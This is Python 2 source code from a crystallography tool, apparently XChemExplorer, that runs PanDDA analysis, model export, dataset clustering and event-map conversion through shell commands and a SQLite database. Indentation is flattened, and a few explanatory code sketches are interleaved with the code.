db_dict['PANDDA_site_spider_plot'] = ''
# find apo structures which were used
# XXX missing XXX
self.db.update_insert_site_event_panddaTable(sampleID,db_dict)
# this is necessary, otherwise RefinementOutcome will be reset for samples that are actually already in refinement
self.db.execute_statement("update panddaTable set RefinementOutcome = '2 - PANDDA model' where CrystalName is '{0!s}' and RefinementOutcome is null".format(sampleID))
self.db.execute_statement("update mainTable set RefinementOutcome = '2 - PANDDA model' where CrystalName is '{0!s}' and (RefinementOutcome is null or RefinementOutcome is '1 - Analysis Pending')".format(sampleID))
self.db.execute_statement("update mainTable set DimplePANDDAhit = 'True' where CrystalName is '{0!s}'".format(sampleID))
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
self.Logfile.insert('done reading pandda_inspect_events.csv')
# finally find all samples which do not have a pandda hit
os.chdir(os.path.join(self.panddas_directory,'processed_datasets'))
self.Logfile.insert('check which datasets are not interesting')
# DimplePANDDAhit
# for xtal in glob.glob('*'):
# if xtal not in pandda_hit_list:
# self.Logfile.insert(xtal+': not in interesting_datasets; updating database...')
# self.db.execute_statement("update mainTable set DimplePANDDAhit = 'False' where CrystalName is '{0!s}'".format(xtal))
def export_models(self):
self.Logfile.insert('finding out which PanDDA models need to be exported')
# first find which samples are in interesting datasets and have a model
# and determine the timestamp
fileModelsDict={}
queryModels=''
for model in glob.glob(os.path.join(self.panddas_directory,'processed_datasets','*','modelled_structures','*-pandda-model.pdb')):
sample=model[model.rfind('/')+1:].replace('-pandda-model.pdb','')
timestamp=datetime.fromtimestamp(os.path.getmtime(model)).strftime('%Y-%m-%d %H:%M:%S')
self.Logfile.insert(sample+'-pandda-model.pdb was created on '+str(timestamp))
queryModels+="'"+sample+"',"
fileModelsDict[sample]=timestamp
# now get these models from the database and compare the datestamps
# Note: only get the models that underwent some form of refinement,
# because only if the model was updated in pandda.inspect will it be exported and refined
dbModelsDict={}
if queryModels != '':
dbEntries=self.db.execute_statement("select CrystalName,DatePanDDAModelCreated from mainTable where CrystalName in ("+queryModels[:-1]+") and (RefinementOutcome like '3%' or RefinementOutcome like '4%' or RefinementOutcome like '5%')")
for item in dbEntries:
xtal=str(item[0])
timestamp=str(item[1])
dbModelsDict[xtal]=timestamp
self.Logfile.insert('PanDDA model for '+xtal+' is in database and was created on '+str(timestamp))
# compare timestamps and only export the ones where the timestamp of the file is newer than the one in the DB
samples_to_export={}
self.Logfile.insert('checking which PanDDA models were newly created or updated')
if self.which_models=='all':
self.Logfile.insert('Note: you chose to export ALL available PanDDA models!')
for sample in fileModelsDict:
if self.which_models=='all':
self.Logfile.insert('exporting '+sample)
samples_to_export[sample]=fileModelsDict[sample]
elif self.which_models == 'selected':
for i in range(0, self.pandda_analyse_data_table.rowCount()):
if str(self.pandda_analyse_data_table.item(i, 0).text()) == sample:
if self.pandda_analyse_data_table.cellWidget(i, 1).isChecked():
self.Logfile.insert('Dataset selected by user -> exporting '+sample)
samples_to_export[sample]=fileModelsDict[sample]
break
else:
if sample in dbModelsDict:
try:
difference=(datetime.strptime(fileModelsDict[sample],'%Y-%m-%d %H:%M:%S') - datetime.strptime(dbModelsDict[sample],'%Y-%m-%d %H:%M:%S') )
if difference.seconds != 0:
self.Logfile.insert('exporting '+sample+' -> was already refined, but newer PanDDA model available')
samples_to_export[sample]=fileModelsDict[sample]
except ValueError:
# this will be raised if timestamp is not properly formatted;
# which will usually be the case when respective field in database is blank
# these are hopefully legacy cases which are from before this extensive check was introduced (13/01/2017)
advice = ( 'The pandda model of '+sample+' was changed, but it was already refined! '
'This is most likely because this was done with an older version of XCE. '
'If you really want to export and refine this model, you need to open the database '
'with DBbrowser (sqlitebrowser.org); then change the RefinementOutcome field '
'of the respective sample to "2 - PANDDA model", save the database and repeat the export procedure.' )
self.Logfile.insert(advice)
else:
self.Logfile.insert('exporting '+sample+' -> first time to be exported and refined')
samples_to_export[sample]=fileModelsDict[sample]
# update the DB:
# set timestamp to current timestamp of file and set RefinementOutcome to '2-pandda...'
if samples_to_export != {}:
select_dir_string=''
select_dir_string_new_pannda=' '
for sample in samples_to_export:
db_dict= {'RefinementOutcome': '2 - PANDDA model', 'DatePanDDAModelCreated': samples_to_export[sample]}
select_dir_string+="select_dir={0!s} ".format(sample)
select_dir_string_new_pannda+='{0!s} '.format(sample)
self.Logfile.insert('updating database for '+sample+' setting time model was created to '+db_dict['DatePanDDAModelCreated']+' and RefinementOutcome to '+db_dict['RefinementOutcome'])
self.db.update_data_source(sample,db_dict)
if os.path.isdir(os.path.join(self.panddas_directory,'rejected_datasets')):
Cmds = (
'pandda.export'
' pandda_dir=%s' %self.panddas_directory+
' export_dir={0!s}'.format(self.initial_model_directory)+
' {0!s}'.format(select_dir_string)+
' export_ligands=False'
' generate_occupancy_groupings=True\n'
)
else:
Cmds = (
'source /dls/science/groups/i04-1/software/pandda-update/ccp4/ccp4-7.0/bin/ccp4.setup-sh\n'
# 'source '+os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-sh')+'\n'
'pandda.export'
' pandda_dir=%s' %self.panddas_directory+
' export_dir={0!s}'.format(self.initial_model_directory)+
' {0!s}'.format(select_dir_string_new_pannda)+
' generate_restraints=True\n'
)
self.Logfile.insert('running pandda.export with the following settings:\n'+Cmds)
os.system(Cmds)
return samples_to_export
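# export_models() above decides whether to re-export a model by comparing the
# file timestamp of *-pandda-model.pdb against DatePanDDAModelCreated in the
# database. A minimal sketch of that decision, isolated into a pure function
# (the name 'model_needs_export' is illustrative); note it uses
# total_seconds() rather than the .seconds attribute, which ignores whole-day
# differences:

```python
from datetime import datetime

TIMESTAMP_FMT = '%Y-%m-%d %H:%M:%S'

def model_needs_export(file_timestamp, db_timestamp):
    """True if the on-disk pandda model timestamp differs from the one
    recorded in the database. A ValueError (e.g. a blank database field)
    is treated as 'do not export', matching the cautious behaviour of
    export_models above; no database entry at all means first export."""
    if db_timestamp is None:
        return True  # first time to be exported and refined
    try:
        difference = (datetime.strptime(file_timestamp, TIMESTAMP_FMT) -
                      datetime.strptime(db_timestamp, TIMESTAMP_FMT))
    except ValueError:
        return False
    return difference.total_seconds() != 0
```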
class run_pandda_analyse(QtCore.QThread):
def __init__(self,pandda_params,xce_logfile,datasource):
QtCore.QThread.__init__(self)
self.data_directory=pandda_params['data_dir']
self.panddas_directory=pandda_params['out_dir']
self.submit_mode=pandda_params['submit_mode']
self.pandda_analyse_data_table = pandda_params['pandda_table']
self.nproc=pandda_params['nproc']
self.min_build_datasets=pandda_params['min_build_datasets']
self.pdb_style=pandda_params['pdb_style']
self.mtz_style=pandda_params['mtz_style']
self.sort_event=pandda_params['sort_event']
self.number_of_datasets=pandda_params['N_datasets']
self.max_new_datasets=pandda_params['max_new_datasets']
self.grid_spacing=pandda_params['grid_spacing']
self.reference_dir=pandda_params['reference_dir']
self.filter_pdb=os.path.join(self.reference_dir,pandda_params['filter_pdb'])
self.wilson_scaling = pandda_params['perform_diffraction_data_scaling']
self.Logfile=XChemLog.updateLog(xce_logfile)
self.datasource=datasource
self.db=XChemDB.data_source(datasource)
self.appendix=pandda_params['appendix']
self.write_mean_maps=pandda_params['write_mean_map']
self.calc_map_by = pandda_params['average_map']
self.select_ground_state_model=''
projectDir = self.data_directory.replace('/*', '')
self.make_ligand_links='$CCP4/bin/ccp4-python %s %s %s\n' %(os.path.join(os.getenv('XChemExplorer_DIR'),
'helpers',
'make_ligand_links_after_pandda.py')
,projectDir,self.panddas_directory)
self.use_remote = pandda_params['use_remote']
self.remote_string = pandda_params['remote_string']
if self.appendix != '':
self.panddas_directory=os.path.join(self.reference_dir,'pandda_'+self.appendix)
if os.path.isdir(self.panddas_directory):
os.system('/bin/rm -fr %s' %self.panddas_directory)
os.mkdir(self.panddas_directory)
if self.data_directory.startswith('/dls'):
self.select_ground_state_model = 'module load ccp4\n'
self.select_ground_state_model +='$CCP4/bin/ccp4-python %s %s\n' %(os.path.join(os.getenv('XChemExplorer_DIR'),'helpers','select_ground_state_dataset.py'),self.panddas_directory)
self.make_ligand_links=''
def run(self):
# print self.reference_dir
# print self.filter_pdb
# how to run pandda.analyse on large datasets
#
# 1) Run the normal pandda command, with the new setting, e.g.
# pandda.analyse data_dirs=... max_new_datasets=500
# This will do the analysis on the first 500 datasets and build the statistical maps - just as normal.
#
# 2) Run pandda with the same command:
# pandda.analyse data_dirs=... max_new_datasets=500
# This will add 500 new datasets, and process them using the existing statistical maps
# (this will be quicker than the original analysis). It will then merge the results of the two analyses.
#
# 3) Repeat 2) until you don't add any "new" datasets. Then you can build the models as normal.
number_of_cyles=int(self.number_of_datasets)/int(self.max_new_datasets)
if int(self.number_of_datasets) % int(self.max_new_datasets) != 0: # modulo gives remainder after integer division
number_of_cyles+=1
self.Logfile.insert('will run %s rounds of pandda.analyse' %str(number_of_cyles))
if os.path.isfile(os.path.join(self.panddas_directory,'pandda.running')):
self.Logfile.insert('it looks as if a pandda.analyse job is currently running in: '+self.panddas_directory)
msg = ( 'there are three possibilities:\n'
'1.) choose another PANDDA directory\n'
'2.) - check if the job is really running either on the cluster (qstat) or on your local machine\n'
' - if so, be patient and wait until the job has finished\n'
'3.) same as 2., but instead of waiting, kill the job and remove at least the pandda.running file\n'
' (or all the contents in the directory if you want to start from scratch)\n' )
self.Logfile.insert(msg)
return None
else:
# if os.getenv('SHELL') == '/bin/tcsh' or os.getenv('SHELL') == '/bin/csh':
# source_file=os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-csh\n')
# elif os.getenv('SHELL') == '/bin/bash' or self.use_remote:
# source_file='export XChemExplorer_DIR="'+os.getenv('XChemExplorer_DIR')+'"\n'
# source_file+='source %s\n' %os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-sh\n')
# else:
# source_file=''
# v1.2.1 - pandda.setup files should be obsolete now that pandda is part of ccp4
# 08/10/2020 - pandda v0.2.12 installation at DLS is obsolete
# source_file='source /dls/science/groups/i04-1/software/pandda_0.2.12/ccp4/ccp4-7.0/bin/ccp4.setup-sh\n'
source_file = ''
source_file += 'export XChemExplorer_DIR="' + os.getenv('XChemExplorer_DIR') + '"\n'
if os.path.isfile(self.filter_pdb + '.pdb'):
print('filter pdb located')
filter_pdb=' filter.pdb='+self.filter_pdb+'.pdb'
print('will use ' + filter_pdb + ' as a filter for pandda.analyse')
else:
if self.use_remote:
stat_command = self.remote_string.replace("qsub'", str('stat ' + self.filter_pdb + "'"))
output = subprocess.Popen(stat_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = output.communicate()
print out
if 'cannot stat' in out:
filter_pdb = ''
else:
filter_pdb = ' filter.pdb=' + self.filter_pdb + '.pdb'
else:
filter_pdb=''
os.chdir(self.panddas_directory)
# note: copied latest pandda.setup-sh from XCE2 installation (08/08/2017)
dls = ''
if self.data_directory.startswith('/dls'):
dls = (
source_file +
'\n'
'module load pymol/1.8.2.0\n'
'\n'
'module load ccp4/7.0.072\n'
'\n'
)
Cmds = (
'#!'+os.getenv('SHELL')+'\n' +
'\n' +
dls +
'cd ' + self.panddas_directory + '\n' +
'\n'
)
ignore = []
char = []
zmap = []
for i in range(0, self.pandda_analyse_data_table.rowCount()):
ignore_all_checkbox = self.pandda_analyse_data_table.cellWidget(i, 7)
ignore_characterisation_checkbox = self.pandda_analyse_data_table.cellWidget(i, 8)
ignore_zmap_checkbox = self.pandda_analyse_data_table.cellWidget(i, 9)
if ignore_all_checkbox.isChecked():
ignore.append(str(self.pandda_analyse_data_table.item(i, 0).text()))
if ignore_characterisation_checkbox.isChecked():
char.append(str(self.pandda_analyse_data_table.item(i, 0).text()))
if ignore_zmap_checkbox.isChecked():
zmap.append(str(self.pandda_analyse_data_table.item(i, 0).text()))
print ignore
def append_to_ignore_string(datasets_list, append_string):
if len(datasets_list)==0:
append_string = ''
for i in range(0, len(datasets_list)):
if i < len(datasets_list)-1:
append_string += str(datasets_list[i] + ',')
else:
append_string += str(datasets_list[i] +'"')
print(append_string)
return append_string
ignore_string = 'ignore_datasets="'
ignore_string = append_to_ignore_string(ignore, ignore_string)
char_string = 'exclude_from_characterisation="'
char_string = append_to_ignore_string(char, char_string)
zmap_string = 'exclude_from_z_map_analysis="'
zmap_string = append_to_ignore_string(zmap, zmap_string)
for i in range(number_of_cyles):
Cmds += (
'pandda.analyse '+
' data_dirs="'+self.data_directory.replace('/*','')+'/*"'+
' out_dir="'+self.panddas_directory+'"'
' min_build_datasets='+self.min_build_datasets+
' max_new_datasets='+self.max_new_datasets+
' grid_spacing='+self.grid_spacing+
' cpus='+self.nproc+
' events.order_by='+self.sort_event+
filter_pdb+
' pdb_style='+self.pdb_style+
' mtz_style='+self.mtz_style+
' lig_style=/compound/*.cif'+
' apply_b_factor_scaling='+self.wilson_scaling+
' write_average_map='+self.write_mean_maps +
' average_map=' + self.calc_map_by +
' ' +
ignore_string +' '+
char_string +' '+
zmap_string +' '+
'\n'
)
Cmds += self.select_ground_state_model
Cmds += self.make_ligand_links
Cmds += '\n'
data_dir_string = self.data_directory.replace('/*', '')
Cmds += str(
'find ' + data_dir_string +
'/*/compound -name "*.cif" | while read line; do echo ${line//"' +
data_dir_string + '"/"' + self.panddas_directory +
'/processed_datasets/"}| while read line2; do cp $line ${line2//compound/ligand_files} > /dev/null 2>&1; '
'done; done;')
Cmds += '\n'
Cmds += str(
'find ' + data_dir_string +
'/*/compound -name "*.pdb" | while read line; do echo ${line//"' +
data_dir_string + '"/"' + self.panddas_directory +
'/processed_datasets/"}| while read line2; do cp $line ${line2//compound/ligand_files} > /dev/null 2>&1; '
'done; done;')
self.Logfile.insert('running pandda.analyse with the following command:\n'+Cmds)
f = open('pandda.sh','w')
f.write(Cmds)
f.close()
# #>>> for testing
# self.submit_mode='local machine'
self.Logfile.insert('trying to run pandda.analyse on ' + str(self.submit_mode))
if self.submit_mode=='local machine':
self.Logfile.insert('running PANDDA on local machine')
os.system('chmod +x pandda.sh')
os.system('./pandda.sh &')
elif self.use_remote:
# handles remote submission of pandda.analyse jobs
submission_string = self.remote_string.replace("qsub'",
str('cd ' +
self.panddas_directory +
'; ' +
"qsub -P labxchem -q medium.q -N pandda -l exclusive,m_mem_free=100G pandda.sh'"))
os.system(submission_string)
self.Logfile.insert(str('running PANDDA remotely, using: ' + submission_string))
else:
self.Logfile.insert('running PANDDA on cluster, using qsub...')
os.system('qsub -P labxchem -q medium.q -N pandda -l exclusive,m_mem_free=100G pandda.sh')
self.emit(QtCore.SIGNAL('datasource_menu_reload_samples'))
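# run() above does two small calculations worth isolating: the number of
# pandda.analyse rounds needed when at most max_new_datasets are processed
# per round (ceiling division), and the comma-joined exclusion arguments
# built by append_to_ignore_string. A minimal sketch of both (function names
# are illustrative):

```python
def number_of_analysis_cycles(n_datasets, max_new_datasets):
    """Ceiling division: how many pandda.analyse rounds are needed when
    each round adds at most max_new_datasets new datasets."""
    cycles = n_datasets // max_new_datasets
    if n_datasets % max_new_datasets != 0:  # modulo gives remainder after integer division
        cycles += 1
    return cycles

def build_exclude_arg(keyword, datasets):
    """Build an argument such as ignore_datasets="xtal1,xtal2" from a list
    of dataset names; returns '' for an empty list, as the original
    append_to_ignore_string does."""
    if not datasets:
        return ''
    return '%s="%s"' % (keyword, ','.join(datasets))
```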
class giant_cluster_datasets(QtCore.QThread):
def __init__(self,initial_model_directory,pandda_params,xce_logfile,datasource,):
QtCore.QThread.__init__(self)
self.panddas_directory=pandda_params['out_dir']
self.pdb_style=pandda_params['pdb_style']
self.mtz_style=pandda_params['mtz_style']
self.Logfile=XChemLog.updateLog(xce_logfile)
self.initial_model_directory=initial_model_directory
self.db=XChemDB.data_source(datasource)
def run(self):
self.emit(QtCore.SIGNAL('update_progress_bar'), 0)
if self.pdb_style.replace(' ','') == '':
self.Logfile.insert('PDB style is not set in pandda.analyse!')
self.Logfile.insert('cannot start pandda.analyse')
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'PDB style is not set in pandda.analyse!')
return None
if self.mtz_style.replace(' ','') == '':
self.Logfile.insert('MTZ style is not set in pandda.analyse!')
self.Logfile.insert('cannot start pandda.analyse')
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'MTZ style is not set in pandda.analyse!')
return None
# 1.) prepare output directory
os.chdir(self.panddas_directory)
if os.path.isdir('cluster_analysis'):
self.Logfile.insert('removing old cluster_analysis directory in {0!s}'.format(self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'removing old cluster_analysis directory in {0!s}'.format(self.panddas_directory))
os.system('/bin/rm -fr cluster_analysis 2> /dev/null')
self.Logfile.insert('creating cluster_analysis directory in {0!s}'.format(self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'creating cluster_analysis directory in {0!s}'.format(self.panddas_directory))
os.mkdir('cluster_analysis')
self.emit(QtCore.SIGNAL('update_progress_bar'), 10)
# 2.) go through project directory and make sure that all pdb files really exist
# broken links derail the giant.cluster_mtzs_and_pdbs script
self.Logfile.insert('cleaning up broken links of {0!s} and {1!s} in {2!s}'.format(self.pdb_style, self.mtz_style, self.initial_model_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'cleaning up broken links of {0!s} and {1!s} in {2!s}'.format(self.pdb_style, self.mtz_style, self.initial_model_directory))
os.chdir(self.initial_model_directory)
for xtal in glob.glob('*'):
if not os.path.isfile(os.path.join(xtal,self.pdb_style)):
self.Logfile.insert('missing {0!s} and {1!s} for {2!s}'.format(self.pdb_style, self.mtz_style, xtal))
os.system('/bin/rm {0!s}/{1!s} 2> /dev/null'.format(xtal, self.pdb_style))
os.system('/bin/rm {0!s}/{1!s} 2> /dev/null'.format(xtal, self.mtz_style))
self.emit(QtCore.SIGNAL('update_progress_bar'), 20)
# 3.) giant.datasets.cluster
self.Logfile.insert("running giant.datasets.cluster {0!s}/*/{1!s} pdb_regex='{2!s}/(.*)/{3!s}' out_dir='{4!s}/cluster_analysis'".format(self.initial_model_directory, self.pdb_style, self.initial_model_directory, self.pdb_style, self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'running giant.datasets.cluster')
if os.getenv('SHELL') == '/bin/tcsh' or os.getenv('SHELL') == '/bin/csh':
source_file=os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-csh')
elif os.getenv('SHELL') == '/bin/bash':
source_file=os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-sh')
else:
source_file=''
Cmds = (
'#!'+os.getenv('SHELL')+'\n'
'unset PYTHONPATH\n'
'source '+source_file+'\n'
"giant.datasets.cluster %s/*/%s pdb_regex='%s/(.*)/%s' out_dir='%s/cluster_analysis'" %(self.initial_model_directory,self.pdb_style,self.initial_model_directory,self.pdb_style,self.panddas_directory)
)
# os.system("giant.cluster_mtzs_and_pdbs %s/*/%s pdb_regex='%s/(.*)/%s' out_dir='%s/cluster_analysis'" %(self.initial_model_directory,self.pdb_style,self.initial_model_directory,self.pdb_style,self.panddas_directory))
os.system(Cmds)
self.emit(QtCore.SIGNAL('update_progress_bar'), 80)
# 4.) analyse output
self.Logfile.insert('parsing {0!s}/cluster_analysis'.format(self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'parsing {0!s}/cluster_analysis'.format(self.panddas_directory))
os.chdir('{0!s}/cluster_analysis'.format(self.panddas_directory))
cluster_dict={}
for out_dir in sorted(glob.glob('*')):
if os.path.isdir(out_dir):
cluster_dict[out_dir]=[]
for folder in glob.glob(os.path.join(out_dir,'pdbs','*')):
xtal=folder[folder.rfind('/')+1:]
cluster_dict[out_dir].append(xtal)
self.emit(QtCore.SIGNAL('update_progress_bar'), 90)
# 5.) update datasource
self.Logfile.insert('updating datasource with results from giant.datasets.cluster')
if cluster_dict != {}:
for key in cluster_dict:
for xtal in cluster_dict[key]:
db_dict= {'CrystalFormName': key}
self.db.update_data_source(xtal,db_dict)
# 6.) finish
self.emit(QtCore.SIGNAL('update_progress_bar'), 100)
self.Logfile.insert('finished giant.datasets.cluster')
self.emit(QtCore.SIGNAL('datasource_menu_reload_samples'))
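# Step 4 of giant_cluster_datasets.run() above walks the
# cluster_analysis/<cluster>/pdbs/<crystal> layout into a dictionary. A
# minimal sketch of that parsing, using os.path.basename instead of manual
# rfind('/') slicing (the function name is illustrative and the exact output
# layout of giant.datasets.cluster is assumed from the code above):

```python
import glob
import os

def parse_cluster_output(cluster_analysis_dir):
    """Collect {cluster_name: [crystal, ...]} from the directory layout
    <cluster_analysis_dir>/<cluster>/pdbs/<crystal>/ ; crystals are
    sorted so the result is deterministic."""
    cluster_dict = {}
    for out_dir in sorted(glob.glob(os.path.join(cluster_analysis_dir, '*'))):
        if not os.path.isdir(out_dir):
            continue  # skip stray files at the top level
        name = os.path.basename(out_dir)
        cluster_dict[name] = sorted(
            os.path.basename(folder)
            for folder in glob.glob(os.path.join(out_dir, 'pdbs', '*')))
    return cluster_dict
```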
class check_if_pandda_can_run:
# reasons why pandda cannot be run
# - there is currently a job running in the pandda directory
# - min datasets available is too low
# - required input parameters are not complete
# - map amplitude and phase labels don't exist
def __init__(self,pandda_params,xce_logfile,datasource):
self.data_directory=pandda_params['data_dir']
self.panddas_directory=pandda_params['out_dir']
self.min_build_datasets=pandda_params['min_build_datasets']
self.pdb_style=pandda_params['pdb_style']
self.mtz_style=pandda_params['mtz_style']
self.input_dir_structure=pandda_params['pandda_dir_structure']
self.problem_found=False
self.error_code=-1
self.Logfile=XChemLog.updateLog(xce_logfile)
self.db=XChemDB.data_source(datasource)
def number_of_available_datasets(self):
counter=0
for file in glob.glob(os.path.join(self.input_dir_structure,self.pdb_style)):
if os.path.isfile(file):
counter+=1
self.Logfile.insert('pandda.analyse: found {0!s} usable datasets'.format(counter))
return counter
def get_first_dataset_in_project_directory(self):
first_dataset=''
for file in glob.glob(os.path.join(self.input_dir_structure,self.pdb_style)):
if os.path.isfile(file):
first_dataset=file
break
return first_dataset
def compare_number_of_atoms_in_reference_vs_all_datasets(self,refData,dataset_list):
mismatched_datasets=[]
pdbtools=XChemUtils.pdbtools(refData)
refPDB=refData[refData.rfind('/')+1:]
refPDBlist=pdbtools.get_init_pdb_as_list()
n_atom_ref=len(refPDBlist)
for n_datasets,dataset in enumerate(dataset_list):
if os.path.isfile(os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style)):
n_atom=len(pdbtools.get_pdb_as_list(os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style)))
if n_atom_ref == n_atom:
self.Logfile.insert('{0!s}: atoms in PDB file ({1!s}): {2!s}; atoms in Reference file: {3!s} ===> OK'.format(dataset, self.pdb_style, str(n_atom), str(n_atom_ref)))
if n_atom_ref != n_atom:
self.Logfile.insert('{0!s}: atoms in PDB file ({1!s}): {2!s}; atoms in Reference file: {3!s} ===> ERROR'.format(dataset, self.pdb_style, str(n_atom), str(n_atom_ref)))
mismatched_datasets.append(dataset)
return n_datasets,mismatched_datasets
def get_datasets_which_fit_to_reference_file(self,ref,reference_directory,cluster_dict,allowed_unitcell_difference_percent):
refStructure=XChemUtils.pdbtools(os.path.join(reference_directory,ref+'.pdb'))
symmRef=refStructure.get_spg_number_from_pdb()
ucVolRef=refStructure.calc_unitcell_volume_from_pdb()
cluster_dict[ref]=[]
cluster_dict[ref].append(os.path.join(reference_directory,ref+'.pdb'))
for dataset in glob.glob(os.path.join(self.data_directory,self.pdb_style)):
datasetStructure=XChemUtils.pdbtools(dataset)
symmDataset=datasetStructure.get_spg_number_from_pdb()
ucVolDataset=datasetStructure.calc_unitcell_volume_from_pdb()
if symmDataset == symmRef:
try:
difference=math.fabs(1-(float(ucVolRef)/float(ucVolDataset)))*100
if difference < allowed_unitcell_difference_percent:
sampleID=dataset.replace('/'+self.pdb_style,'')[dataset.replace('/'+self.pdb_style,'').rfind('/')+1:]
cluster_dict[ref].append(sampleID)
except ZeroDivisionError:
continue
return cluster_dict
def remove_dimple_files(self,dataset_list):
for n_datasets,dataset in enumerate(dataset_list):
db_dict={}
if os.path.isfile(os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style)):
os.system('/bin/rm '+os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style))
self.Logfile.insert('{0!s}: removing {1!s}'.format(dataset, self.pdb_style))
db_dict['DimplePathToPDB']=''
db_dict['DimpleRcryst']=''
db_dict['DimpleRfree']=''
db_dict['DimpleResolutionHigh']=''
db_dict['DimpleStatus']='pending'
if os.path.isfile(os.path.join(self.data_directory.replace('*',''),dataset,self.mtz_style)):
os.system('/bin/rm '+os.path.join(self.data_directory.replace('*',''),dataset,self.mtz_style))
self.Logfile.insert('{0!s}: removing {1!s}'.format(dataset, self.mtz_style))
db_dict['DimplePathToMTZ']=''
if db_dict != {}:
self.db.update_data_source(dataset,db_dict)
def analyse_pdb_style(self):
pdb_found=False
for file in glob.glob(os.path.join(self.data_directory,self.pdb_style)):
if os.path.isfile(file):
pdb_found=True
break
if not pdb_found:
self.error_code=1
message=self.warning_messages()
return message
def analyse_mtz_style(self):
mtz_found=False
for file in glob.glob(os.path.join(self.data_directory,self.mtz_style)):
if os.path.isfile(file):
mtz_found=True
break
if not mtz_found:
self.error_code=2
message=self.warning_messages()
return message
def analyse_min_build_dataset(self):
counter=0
for file in glob.glob(os.path.join(self.data_directory,self.mtz_style)):
if os.path.isfile(file):
counter+=1
if counter <= self.min_build_datasets:
self.error_code=3
message=self.warning_messages()
return message
def warning_messages(self):
message=''
if self.error_code==1:
message='PDB file does not exist'
if self.error_code==2:
message='MTZ file does not exist'
if self.error_code==3:
message='Not enough datasets available'
return message
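The if-chain above can equally be expressed as a lookup table; a small sketch (names hypothetical) that returns the same strings:

```python
WARNING_MESSAGES = {
    1: 'PDB file does not exist',
    2: 'MTZ file does not exist',
    3: 'Not enough datasets available',
}

def warning_message(error_code):
    # dict-based equivalent of the sequential if statements above;
    # unknown codes fall back to an empty string, as in the original
    return WARNING_MESSAGES.get(error_code, '')

print(warning_message(2))  # MTZ file does not exist
```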
class convert_all_event_maps_in_database(QtCore.QThread):
def __init__(self,initial_model_directory,xce_logfile,datasource):
QtCore.QThread.__init__(self)
self.xce_logfile=xce_logfile
self.Logfile=XChemLog.updateLog(xce_logfile)
self.initial_model_directory=initial_model_directory
self.datasource=datasource
self.db=XChemDB.data_source(datasource)
def run(self):
sqlite = (
'select'
' CrystalName,'
' PANDDA_site_event_map,'
' PANDDA_site_ligand_resname,'
' PANDDA_site_ligand_chain,'
' PANDDA_site_ligand_sequence_number,'
' PANDDA_site_ligand_altLoc '
'from panddaTable '
'where PANDDA_site_event_map not like "event%"'
)
print(sqlite)
query=self.db.execute_statement(sqlite)
print(query)
progress_step=1
if len(query) != 0:
progress_step=100/float(len(query))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
for item in query:
print(item)
xtalID=str(item[0])
event_map=str(item[1])
resname=str(item[2])
chainID=str(item[3])
resseq=str(item[4])
altLoc=str(item[5])
if os.path.isfile(os.path.join(self.initial_model_directory,xtalID,'refine.pdb')):
os.chdir(os.path.join(self.initial_model_directory,xtalID))
self.Logfile.insert('extracting ligand ({0!s},{1!s},{2!s},{3!s}) from refine.pdb'.format(str(resname), str(chainID), str(resseq), str(altLoc)))
XChemUtils.pdbtools(os.path.join(self.initial_model_directory,xtalID,'refine.pdb')).save_specific_ligands_to_pdb(resname,chainID,resseq,altLoc)
if os.path.isfile('ligand_{0!s}_{1!s}_{2!s}_{3!s}.pdb'.format(str(resname), str(chainID), str(resseq), str(altLoc))):
ligand_pdb='ligand_{0!s}_{1!s}_{2!s}_{3!s}.pdb'.format(str(resname), str(chainID), str(resseq), str(altLoc))
print(os.path.join(self.initial_model_directory,xtalID,ligand_pdb))
else:
self.Logfile.insert('could not extract ligand; trying next...')
continue
else:
self.Logfile.insert('directory: '+os.path.join(self.initial_model_directory,xtalID)+' -> cannot find refine.pdb; trying next')
continue
if os.path.isfile(os.path.join(self.initial_model_directory,xtalID,'refine.mtz')):
resolution=XChemUtils.mtztools(os.path.join(self.initial_model_directory,xtalID,'refine.mtz')).get_high_resolution_from_mtz()
else:
self.Logfile.insert('directory: '+os.path.join(self.initial_model_directory,xtalID)+' -> cannot find refine.mtz; trying next')
continue
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'eventMap -> SF for '+event_map)
convert_event_map_to_SF(self.initial_model_directory,xtalID,event_map,ligand_pdb,self.xce_logfile,self.datasource,resolution).run()
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
class convert_event_map_to_SF:
def __init__(self,project_directory,xtalID,event_map,ligand_pdb,xce_logfile,db_file,resolution):
self.Logfile=XChemLog.updateLog(xce_logfile)
self.event_map=event_map
if not os.path.isfile(self.event_map):
self.Logfile.insert('cannot find Event map: '+self.event_map)
self.Logfile.insert('cannot convert event_map to structure factors!')
return None
self.project_directory=project_directory
self.xtalID=xtalID
self.event_map=event_map
self.ligand_pdb=ligand_pdb
self.event=event_map[event_map.rfind('/')+1:].replace('.map','').replace('.ccp4','')
self.db=XChemDB.data_source(db_file)
self.resolution=resolution
def run(self):
os.chdir(os.path.join(self.project_directory,self.xtalID))
# remove existing mtz file
if os.path.isfile(self.event+'.mtz'):
self.Logfile.insert('removing existing '+self.event+'.mtz')
os.system('/bin/rm '+self.event+'.mtz')
# event maps generated with pandda v0.2 or higher have the same symmetry as the crystal,
# but phenix.map_to_structure_factors only accepts maps in space group P1;
# the map is therefore first expanded to the full unit cell and its space group set to P1.
# other conversion options like cinvfft give, for whatever reason, uninterpretable maps
self.convert_map_to_p1()
# run phenix.map_to_structure_factors
self.run_phenix_map_to_structure_factors()
self.remove_and_rename_column_labels()
